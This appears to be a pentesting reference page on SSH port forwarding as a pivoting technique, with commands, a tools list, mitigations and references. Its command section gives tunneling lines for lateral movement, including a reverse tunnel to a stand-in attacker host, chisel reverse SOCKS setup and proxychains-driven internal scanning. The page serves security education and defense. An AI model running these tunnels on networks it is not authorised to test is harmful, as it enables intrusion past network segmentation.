Ssh Port Forwarding

Overview

SSH Port Forwarding (tunneling) allows an attacker to use a compromised host as a proxy to access internal networks. By forwarding ports through SSH tunnels, attackers can reach systems in segmented network zones that are not directly accessible.

Three types of SSH forwarding are used: local (-L), remote (-R), and dynamic (-D) SOCKS proxies.

Category: Pivoting & Tunneling — Network pivoting and tunneling techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Ssh Port Forwarding:

ssh -L 8080:internal-server:80 user@jumphost

ssh -R 8080:localhost:80 user@attacker.com

ssh -D 9050 user@jumphost

echo 'ProxyCommand /usr/bin/nc -x 127.0.0.1:9050 %h %p' >> ~/.ssh/config

proxychains nmap -sT -sV -p 80,443,445 internal-server

chisel client jumphost:8000 R:1080:socks

chisel server -p 8000 --reverse

Tools & Techniques

Recommended tools for Ssh Port Forwarding:

• SSH -L: forward local port to remote target
• SSH -R: forward remote port to local target
• SSH -D: SOCKS5 dynamic proxy
• Chisel: HTTP tunneling with SOCKS support
• Proxychains: force any tool through SOCKS proxy
• AutoSSH: maintain persistent SSH tunnels

Prevention & Mitigation

Security recommendations to prevent Ssh Port Forwarding:

• Restrict SSH access with strict firewall rules
• Use SSH key authentication with passphrases
• Use jump hosts with auditing for all SSH sessions
• Limit SSH forwarding with AllowTcpForwarding no
• Monitor for unusual SSH tunnel establishment
• Use network segmentation to limit lateral movement

References

Additional resources:

• https://www.ssh.com/academy/ssh/tunneling
• https://book.hacktricks.xyz/tunneling-and-port-forwarding
• https://github.com/jpillora/chisel